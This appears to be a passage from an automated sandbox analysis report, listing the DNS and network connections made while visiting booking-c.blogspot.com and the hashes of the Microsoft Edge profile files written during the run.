US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 booking-c.blogspot.com udp
GB 142.250.187.225:443 booking-c.blogspot.com tcp
GB 142.250.187.225:443 booking-c.blogspot.com tcp
GB 142.250.187.225:443 booking-c.blogspot.com tcp
US 8.8.8.8:53 resources.blogblog.com udp
US 8.8.8.8:53 www.blogger.com udp
GB 216.58.201.105:443 www.blogger.com tcp
GB 216.58.201.105:443 www.blogger.com tcp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ssl.google-analytics.com udp
US 8.8.8.8:53 themes.googleusercontent.com udp
GB 172.217.169.72:443 ssl.google-analytics.com tcp
GB 216.58.201.97:443 themes.googleusercontent.com tcp
GB 172.217.169.72:443 ssl.google-analytics.com udp
GB 142.250.187.225:443 booking-c.blogspot.com udp
US 8.8.8.8:53 105.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 72.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 200.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d5564ccbd62bac229941d2812fc4bfba
SHA1 0483f8496225a0f2ca0d2151fab40e8f4f61ab6d
SHA256 d259ff04090cbde3b87a54554d6e2b8a33ba81e9483acbbe3e6bad15cbde4921
SHA512 300cda7933e8af577bdc1b20e6d4279d1e418cdb0571c928b1568bfea3c231ba632ccb67313ae73ddeae5586d85db95caffaedd23e973d437f8496a8c5a15025

\??\pipe\LOCAL\crashpad_932_FNZWUEIVLJUCRGTU

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3157bf221ab927ed14c6e985eca38219
SHA1 f366af1045740b534c4f40dad21e93dc4e08c2a5
SHA256 1f1812d99435c0dbd41ddf340e6c7fbc09264135c2469deccdfc1356b69074bc
SHA512 e446104cd9708cc8281aa14a7b3d269b391c8562655d8ca219b7bc827cff80022761b8d7d1079a24512002346e4cfdb914270f0521c21435c87483f1ddcecba2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2272c8e09f389b825e661594aabadf3c
SHA1 4a7535dc7d9f833b7036e840c2639b46a9ff0cd3
SHA256 fd8050fedb8baa87b3fcb5afb7f1077ba26ff82c5dd32345bc13b52de8bda66a
SHA512 0c285b87b28e264b20d9436f9631c4167040994fb15b6668d5bf05882a32260c8d59b85673f95de62ef95c608542b675dab239a4b28babb13eb40cd0347d74f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8fc529ae6476751c40ffe11c2bc19d3a
SHA1 139c4f034d1e46e883abe6916212ada7da9ea091
SHA256 dac9b190a0441e8e8447940f8032b40dec8a24ae51065e6bd63912f9a4024d71
SHA512 736a0ee6f83a862cbfd3d14bf91bebe3d22fd8a2b16afc8e55ff35508a78b9f0a520d025bd3ddda723b42a6b1895d19ae9050eff2f7af0046faacad5bc54fa81

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 1d1c7c7f0b54eb8ba4177f9e91af9dce
SHA1 2b0f0ceb9a374fec8258679c2a039fbce4aff396
SHA256 555c13933eae4e0b0e992713ed8118e2980442f89fbdfb06d3914b607edbbb18
SHA512 4c8930fe2c805c54c0076408aba3fbfb08c24566fba9f6a409b5b1308d39c7b26c96717d43223632f1f71d2e9e68a01b43a60031be8f1ca7a541fe0f56f4d9f2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0dad66b7c913daee80c67f7aa254a3c3
SHA1 d171583bb38b0a47c765c4acb95d2c1f8c316b51
SHA256 50bc86bbcea12efdce5ab2b232d4c42e752f3b5384f63bdbff89804093a38c83
SHA512 5e85090ee68b36c8d4b04ec0d2edb8baff28d43eb625bf9baaa1feb56559b3bacfbca0e6dc6221d603f7e8a98feace0a528c8ff71abeb5759c46817b7916d850

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 cac8248d87ccb0a581b69a3123a86bfd
SHA1 976db3e7214c2b36693a1ebb554e3f2580a6e7ba
SHA256 828b1d5fdeeb6c141ba3a6924954dc437e039fd2deee9099dd03188d04871c9a
SHA512 a6cc29f3257f179d6ced875825f7800ca55dec6df72b76c95502ef06f8408235ef14f60aaea3f39180eb8864849876a63e3bcdbea22ddb8edfa0fba7d2d5cd61